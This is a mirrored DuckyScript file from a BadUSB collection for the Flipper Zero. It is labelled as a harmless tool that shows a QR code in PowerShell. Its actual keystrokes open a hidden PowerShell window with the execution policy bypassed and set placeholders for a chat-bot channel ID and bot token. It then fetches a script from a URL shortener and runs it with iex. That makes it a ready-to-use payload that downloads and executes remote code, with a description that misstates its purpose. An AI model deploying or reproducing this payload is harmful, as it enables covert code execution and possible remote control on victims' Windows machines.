mirror of
https://github.com/beigeworm/BadUSB-Files-For-FlipperZero.git
synced 2025-12-25 04:15:26 -08:00
15 lines
445 B
Plaintext
15 lines
445 B
Plaintext
|
|
REM Title: beigeworm's QR code to console.
|
|
REM Author: @beigeworm
|
|
REM Description: Uses Powershell to display a generated QR code from text or a URL
|
|
REM Target: Windows 10 and 11
|
|
|
|
REM some setup for dukie script
|
|
DEFAULT_DELAY 100
|
|
|
|
REM open powershell (remove "-W H" to show the window)
|
|
DELAY 1000
|
|
GUI r
|
|
DELAY 750
|
|
STRING powershell -NoP -Ep Bypass -W H -C $ch = 'CHANNEL_ID'; $tk = 'BOT_TOKEN'; irm https://is.gd/bwdcc2 | iex
|
|
ENTER |